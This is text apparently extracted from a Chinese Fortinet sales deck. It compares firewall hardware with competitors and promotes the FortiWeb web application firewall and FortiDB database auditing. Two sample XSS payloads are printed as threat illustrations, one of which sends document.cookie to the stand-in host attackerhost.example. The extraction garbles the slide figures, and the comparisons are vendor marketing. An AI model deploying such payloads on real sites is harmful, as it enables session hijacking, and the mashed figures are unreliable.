8个/16个扩展槽（可配5xGE,10xGE,,24xGE，1x10GE，POS)10G满配接口12x10G12x10G12X10G20x10G44x10G8x10G8x10GFG5000ATCA集群式安全平台性能线性扩展单卡吞吐量20G最大吞吐量160G并发会话8000万新建会话80万FortiGate-5060新安全平台1078x加速10GESFP+端口2x标准10/100/1000端口内置64GBSSD1xUSB&1xconsole防火墙

-40Gbps（小包）

IPSECVPN-17Gbps病毒检测–

1.5Gbps新建会话

–10万

并发会话-

1100万最大VDOM-2505000万并发会话50万新建会话7.5G病毒检测FortiSwitch-5003B负载均衡卡5001B安全处理卡108竞争分析：硬件平台技术比较厂商描述技术特点30B/wifi30B,50B/HD,Wifi50B,80C/CM,110C/HD,310B,620B,3016B,3600A,3810A,5020,5050,5140

ASIC-NP+CP专用硬件加速内容层和网络层SSG5,20,140,320,350,520,550SRX210,240,650,3400,3600,5400,5800无加速技术ASA5505,5510,5520,5540,5550,5580无加速技术U200S,U200M,U200A无加速技术109竞争分析：安全虚拟化能力安全功能备注防火墙VPNIPS病毒Web过滤垃圾邮件各项功能均支持虚拟化-VDOMVirtualSystems(VSYS)UTM功能不支持虚拟化VirtualSystems(VSYS)UTM功能不支持虚拟化VirtualSystems(VSYS)UTM功能不支持虚拟化110竞争分析：集中管理能力安全功能备注防火墙VPNIPS病毒Web过滤垃圾邮件唯一提供全功能集中管理能力的厂商需要第三方管理平台来管理防病毒、Web过滤和反垃圾邮件需要第三方管理平台来管理防病毒、Web过滤和反垃圾邮件需要第三方管理平台来管理防病毒、Web过滤和反垃圾邮件111竞争分析：业界认证安全功能备注FWVPNIPSAVICSAV4.1,EAL4+ICSAV1.2+V2.0(SSL)Yes+NSSYesFortiGate拥有业界最多的ICSA认证，唯一获得没有获得的NSS测试机构的UTM认证。ICSAV4.0,EAL4+YesAV认证是TrendMicro的ICSAV4.0,EAL4+ICSAV1.2YesAV认证是TrendMicro的112竞争分析：安全服务入侵防御反病毒、反间谍软件Web过滤反垃圾邮件应用控制FortiGuard服务厂家自有技术OEM/第三方合作X-UTM需要完善的内容防御功能和持续统一的安全服务KaperskySurfControlJuniperSymantectrendmicroironportCiscoironport第三方H3C113FortiWeb

应用防火墙Web应用是什么?Web应用是公开的、面对internet的应用使用标准的浏览器访问，提供Web邮件、在线零售、在线拍卖、wikis以及许多其它功能为企业提供电子商务及商业推动工具

Web应用的编写是为了高效的传输内容在多数情况下，Web应用的安全性不是开发人员优先考虑的部分开放的应用有可能会暴露敏感信息攻击由简单的破坏逐步转变为信用卡和其它个人身份信息窃取银行Web服务器数据中心113数据库服务器前端Web服务器业务数据中心边缘跨站脚本/钓鱼攻击SQL注入，执行命令弱口令，暴力破解数据与审计日志窜改 溢出攻击，权限提升114安恒机密.|114跨站攻击获取COOKIE利用脚本加载一个JS文件，动态创建一个script标记：<TABLEBACKGROUND=javascript:s=document.createElement("script");s.src="/xss.js";document.body.appendChild(s);>

当用户浏览贴子时，用户浏览器将自动执行上的xss.js脚本利用JS文件指向其它网站当用户浏览贴子时，用户浏览器将跳转到另一页面(如虚假登录页面)115Web应用防火墙进行Web应用层分析，透彻理解具体应用并拦截渗透性威胁

传统防火墙检测网络攻击检查IP和端口，不能识别应用类型IPS产品只能检测已知的攻击类型

逃避特殊检测非常容易，不能对SSL流量进行保护，不能识别应用类型不能识别用户，误判率高115网络访问(OSI1–3层)协议(OSI4–7层)网络层应用层网络防火墙IPS及深度包检测防火墙Web应用防火墙FortiWeb

Web应用防火墙的特点116手工实现应用安全配置？管理员需要手动指定：每一个URL、目录、参数、字段长度和类型。动态内容、JavaScript、XML等的正则表达式不断的升级白名单高误判率–不匹配白名单的流量将被阻止

116117FortiWeb–Web应用防火墙117协议规范验证数据泄漏防护自学习和验证规则应用程序攻击签名库身份验证策略设备名称机架式设备HTTP事务处理/秒吞吐量本地存储FortiWeb-400B1U

机架设备10,000100Mb/秒0.5TB标配FortiWeb-1000C1U

机架设备27,000500Mb/秒1TB标配，2TB可选FortiWeb-3000C2U

机架设备40，0001Gb/秒2TB标配，4TB可选ICSAWeb应用防火墙认证119在线透明桥模式方便部署，全透明或者傍路支持在线阻挡攻击反向代理模式

支持请求和服务器回应的内容改写完全支持HTTPS内容安全扫描支持HTTPS应用优化流量负载均衡旁路部署–

镜像接口零网络延迟通过TCPreset阻挡攻击用于最初产品评估,非侵入式网络部署

FortiWeb灵活的部署方式

Web业务应用系统网银

门户FortiWeb在线部署FortiWeb傍路部署120逻辑规则自学习功能根据自学习结果，自动生成配置学习到的网站结构网页表单各项参数学习被保护应用程序的结构URLs参数已知的行为分析访问攻击提供自动生成规则可输出为PDF文件121Web安全签名库技术由全球FortiGuard云安全网络提供服务，发现漏洞后，自动更新签名库规则，维护简单，内置6000条HTTP访问规则，自动匹配应用逻辑算法,全面检测web访问应用数据,动态安全防御体系<SCRIPT>Document.location=‘http://attackerhost.example/cg-bin/

getcookie.cgi?’+document.cookie</SCRIPT>122应用参数逻辑规则检测FortWEB可对受保护的WEB站点进行URL级别控制，针对各种页面定制个性化规则，支持条自定义页面规则5000-8000网页上未加限制的字符输入框，容易受到脚本及注入攻击123防御暴力破解FortWEB可以针对指定网页的访问频率，超过阈值将被阻止，有效的防止渗透者对关键页面暴力破解。124网页防篡改FortiWeb可以发现被入侵或篡改的网页被篡改的网页可以自动或手动恢复125内置Web服务应用扫描器方便的扫描应用程序，发现Web漏洞常见的漏洞SQL注入、跨站攻击及其它125有助于PCIDSS6.6合规图形化报表126SSL安全加密FortiWeb可对原有明文HTTP流量进行SSL加密，SSL加密密钥支持内置及客户自生成证书，服务器运行原有HTTP业务，由FortWEB“装载”了SSL协商过，此过程FortiASICCP6

芯片进行SSL的加/解密运算，WebServersClientHTTPSSSLComputationPCIe

加速卡CP6可加速SSL处理板载Flash存储用来嵌入系统系列号及数字认证127图形报告审计128银行应用案例129内部用户合法权限滥用权限盗用越权滥用权限分配不当临时帐号未及时清理备份数据缺乏保护离职员工的后门合作伙伴合法权限滥用权限盗用越权滥用后门程序DB2/SQL/Oracle/Sybase数据库软件数据库平台漏洞通讯协议漏洞弱鉴权机制日志缺失或不完整

4W：-是谁，做了什么-什么时候，在哪里跟踪：-登录-数据/文件访问-数据/文件变化-模式变化-日志窜改-人为错误-可疑的活动-自定义事件FortiDB数据库扫描和审计系统130FortinetConfidential 扫描安全隐患-提供修补建议

内建最优方案

和/或用户自有标准

持续扫描系统中的每一个数据库

漏洞扫描自动创建正常访问行为基准

不断扫描使用者的可疑行为

可疑数据访问报警

模板监控审计对用户权限变化、对象/schema变化、数据访问、数据更新事件等提供完整历史记录

向数据库管理员、信息安全管理员、审计员审计/法律依从性报告完善的安全扫描和日常数据审计131FortinetConfidential 关键特性对漏洞进行评估，并提供业界标准修补建议，以加固数据库的完整性和安全性。这项特性将帮助排除密码、存取、权限、配置设定等方面的弱点。

自动发现所有的数据库。加速安全及法规顺应性建设。(PCI,SOX,HIPAA)集中特征及策略管理。职责划分。易于创建客户自定义特征及策略。便于识别的报表专家级修复建议分析数据库安全趋势支持多种数据库

(Oracle、SQL、DB2UDB、Sybase)数据库漏洞评估132用户行为监控减少系统数据信息泄露、攻击、篡改的